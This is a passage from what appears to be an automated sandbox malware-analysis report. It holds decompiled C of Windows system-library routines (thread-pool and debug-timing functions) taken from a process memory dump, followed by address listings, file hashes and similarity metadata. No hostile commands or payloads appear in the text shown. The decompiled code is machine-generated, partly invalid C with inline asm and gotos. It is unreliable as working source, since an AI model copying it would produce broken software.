					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x4c22d7c
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E34E624D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L34E62330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L34E62330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E34E624D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L34E62330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x4c22d7c
										E34EDC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x4c22d7c
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x4c22d7c
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E34E7F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x4c20878
									_t86 = _t255 + 0x10; // 0x4c22d7c
									 *0x34f491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x34f491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x34f491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E34E63C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x4c22d7c
										_t250 = E34EDC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E34E7F1DB(_t250);
									_t228 = E34E7F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x4c22d7c
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x34e7ee48
0x34e7ee4a
0x34e7ee4f
0x34e7ee54
0x34e7ee56
0x34e7ee5b
0x34e7ee60
0x34e7ee63
0x34e7ee66
0x34e7ee68
0x34e7ee70
0x34e7ee73
0x34e7ee76
0x34e7ee79
0x34e7ee80
0x34e7ee85
0x34e7ee88
0x00000000
0x34e7ee8b
0x34e7ee93
0x34e7ee98
0x34e7ee9f
0x34e7eeac
0x34e7eeb8
0x34e7eeb8
0x34e7eebe
0x34e7eec6
0x34e7eec9
0x34e7eec9
0x34e7eece
0x34e7eece
0x34e7eece
0x34e7eece
0x34e7eece
0x34e7eece
0x34e7eed3
0x34e7eed6
0x34e7eedb
0x34e7eee0
0x34e7eee6
0x34e7eeee
0x34e7eeee
0x34e7eef0
0x34e7eef4
0x34e7eef6
0x00000000
0x00000000
0x34e7f1dc
0x34e7f1dc
0x34e7eefc
0x34e7eefc
0x34e7ef01
0x34e7ef03
0x34e7ef06
0x34e7ef09
0x34e7ef0c
0x34e7ef0f
0x34e7ef0f
0x34e7ef16
0x34e7ef16
0x34e7ef1b
0x34e7ef20
0x34e7ef26
0x34e7ef29
0x34e7ef2c
0x34e7ef2c
0x34e7ef36
0x34e7ef36
0x34e7ef3b
0x34e7ef40
0x34e7ef46
0x34e7ef4c
0x34e7ef54
0x34e7ef57
0x34e7ef59
0x34e7ef60
0x34e7ef63
0x34e7ef63
0x34e7ef66
0x34e7ef69
0x34e7ef6c
0x34e7f113
0x34e7f113
0x34e7f115
0x34e7f122
0x34e7f127
0x34e7f12b
0x34ebfe64
0x34ebfe6a
0x34ebfe6a
0x00000000
0x34e7f12b
0x34e7ef72
0x34e7ef74
0x00000000
0x00000000
0x34e7ef7a
0x34e7ef7d
0x34e7ef7d
0x34e7ef7d
0x34e7ef81
0x34e7f144
0x34e7f144
0x34e7f14a
0x34ebfd20
0x34ebfd23
0x34e7ef90
0x34e7ef90
0x34e7ef93
0x34ebfd2e
0x34ebfd31
0x00000000
0x00000000
0x34ebfd37
0x34ebfd45
0x34ebfd4b
0x34ebfd4b
0x34ebfd4e
0x00000000
0x00000000
0x00000000
0x34ebfd54
0x34ebfd3c
0x34ebfd3f
0x00000000
0x00000000
0x00000000
0x34ebfd3f
0x34e7ef99
0x34e7ef99
0x34e7ef9c
0x34e7f1a6
0x34e7f1a9
0x00000000
0x00000000
0x00000000
0x34e7f1af
0x34e7efa2
0x34e7efa2
0x34e7efa5
0x34e7efab
0x34e7efae
0x34e7efb4
0x34e7efba
0x34e7efc0
0x34e7efc6
0x34e7efcc
0x34e7efd8
0x34e7efde
0x34e7efe1
0x34e7efe7
0x34e7efe9
0x34e7efec
0x34e7eff3
0x34e7eff8
0x34e7effa
0x34e7efff
0x34e7f002
0x34e7f008
0x34e7f00a
0x34e7f15d
0x34e7f164
0x34e7f165
0x34e7f168
0x34e7f16b
0x34e7f16e
0x34e7f170
0x00000000
0x00000000
0x34e7f176
0x34e7f17a
0x34e7f1c8
0x34e7f1cf
0x34e7f1d0
0x34e7f1d3
0x00000000
0x34e7f1d3
0x34e7f17c
0x34e7f105
0x34e7f105
0x34e7f108
0x34e7f10a
0x34e7f1b7
0x34e7f1b7
0x34e7f110
0x00000000
0x34e7f110
0x34e7f010
0x34e7f010
0x34e7f013
0x34e7f0a2
0x34e7f0a2
0x34e7f0a6
0x34e7f186
0x34e7f186
0x34e7f0ac
0x34e7f0b0
0x34ebfe56
0x34ebfe56
0x34e7f103
0x34e7f103
0x00000000
0x34e7f103
0x34e7f0bc
0x34e7f0c3
0x34e7f0c4
0x34e7f0c7
0x34e7f0ce
0x34ebfe35
0x34ebfe35
0x34ebfe39
0x00000000
0x00000000
0x34ebfe41
0x34ebfe41
0x34ebfe42
0x34ebfe48
0x34ebfe51
0x00000000
0x34ebfe51
0x34e7f0d4
0x34e7f0db
0x00000000
0x00000000
0x34e7f0e1
0x34e7f0e5
0x34e7f193
0x34e7f199
0x34e7f19b
0x00000000
0x00000000
0x34e7f0f4
0x34e7f0f4
0x34e7f0f8
0x34e7f0fa
0x34e7f0fd
0x34ebfe1e
0x34ebfe21
0x34ebfe24
0x34ebfe27
0x34ebfe2a
0x34ebfe2d
0x34ebfe2d
0x34e7f0fd
0x00000000
0x34e7f0f8
0x34e7f0eb
0x34e7f0ee
0x34e7f0f1
0x00000000
0x34e7f0f1
0x34e7f01c
0x34e7f01f
0x34e7f02a
0x34e7f02d
0x34e7f030
0x34e7f034
0x34e7f036
0x34e7f039
0x34e7f045
0x34e7f051
0x34e7f05a
0x34e7f05a
0x34e7f05d
0x34e7f060
0x34e7f062
0x34ebfd59
0x34ebfd5c
0x00000000
0x00000000
0x34ebfd62
0x34ebfd66
0x34ebfd72
0x34ebfd84
0x34ebfd8a
0x34ebfd8d
0x34ebfd90
0x00000000
0x34ebfd90
0x34ebfd68
0x34ebfd6c
0x00000000
0x00000000
0x00000000
0x34e7f068
0x34e7f068
0x34e7f068
0x34e7f06d
0x34ebfd98
0x34ebfda8
0x34ebfdae
0x34ebfdae
0x34e7f073
0x34e7f078
0x34e7f07a
0x34ebfdbf
0x34e7f080
0x34e7f080
0x34e7f080
0x34e7f085
0x34e7f088
0x34ebfde1
0x34ebfde4
0x34ebfde4
0x34e7f08e
0x34e7f095
0x34e7f09d
0x00000000
0x34e7f09d
0x34e7f062
0x34ebfd29
0x34e7f150
0x34e7f153
0x00000000
0x00000000
0x00000000
0x34e7f155
0x34e7ef87
0x34e7ef8a
0x34e7f136
0x34e7f13c
0x34e7f13e
0x00000000
0x00000000
0x00000000
0x34e7f13e
0x00000000
0x34e7ef8a

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d3bee0bc99a42ac58f0d5b9494909045195138fa0a13e040127405f74feb89
Instruction ID: 030fc04f3b4dd5566a08a6c18bb4f349a9c564b0f5371b89b4f19149268f4580
Opcode Fuzzy Hash: 10d3bee0bc99a42ac58f0d5b9494909045195138fa0a13e040127405f74feb89
Instruction Fuzzy Hash: ABE1FF74E00708CFEB25CFA9D980A9DBBF5FF48364F20492AE556A7661DB34A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 34F2A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34F2A0F7
RtlDebugPrintTimes.NTDLL ref: 34F2A1AA
RtlDebugPrintTimes.NTDLL ref: 34F2A1CE
RtlDebugPrintTimes.NTDLL ref: 34F2A1E3

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8e979f220fa855f0ca098f6b4f89de4ff32b4f64abec58743357e7daafe32aa0
Instruction ID: 94b058c2a20571c080ecde94f397fd3965aa9ca58542dad61e789fbb90bcd8f1
Opcode Fuzzy Hash: 8e979f220fa855f0ca098f6b4f89de4ff32b4f64abec58743357e7daafe32aa0
Instruction Fuzzy Hash: 9A516F79B04612DFEB08CE18D891A19B7E5FF89360B184A6DD906DB720DB71EC42CF80

Uniqueness

Uniqueness Score: -1.00%

Function 34E558E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E34E558E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x34f2bd28);
				_push(E34E9AD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x34f4b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E34E58120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E34E580BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E34E58009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E34E98F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L34E553C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E34E56055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E34E56074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E34E56179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E34E8B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E34E563CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L34E62330(_t268, _t377 + 0x2c);
										E34F24407(_t377);
										E34E624D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E34E564F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x34f46644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E34E65D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E34E946E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E34E98F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E34E56D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E34E56D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E34E56E00;
											if(_t342 == E34E56E00) {
												E34E56E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E34E561C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E34E943A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L34E62330(_t288, _t377 + 0x2c);
														E34F24407(_t377);
														E34E624D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E34E57290;
											if(_t342 != E34E57290) {
												__eflags = _t342 - E34E55570;
												if(_t342 != E34E55570) {
													 *0x34f491e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E34E55570( &_v216);
												goto L33;
											}
											E34E57290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E34E56970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E34E4BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E34E56929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != L34E56B70) {
											__eflags = _t384 - E34E556E0;
											if(_t384 != E34E556E0) {
												 *0x34f491e0();
												 *_t384();
											} else {
												E34E556E0(_t361);
											}
										} else {
											L34E56B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E34E57F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L34E62330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E34E624D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E34E98F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
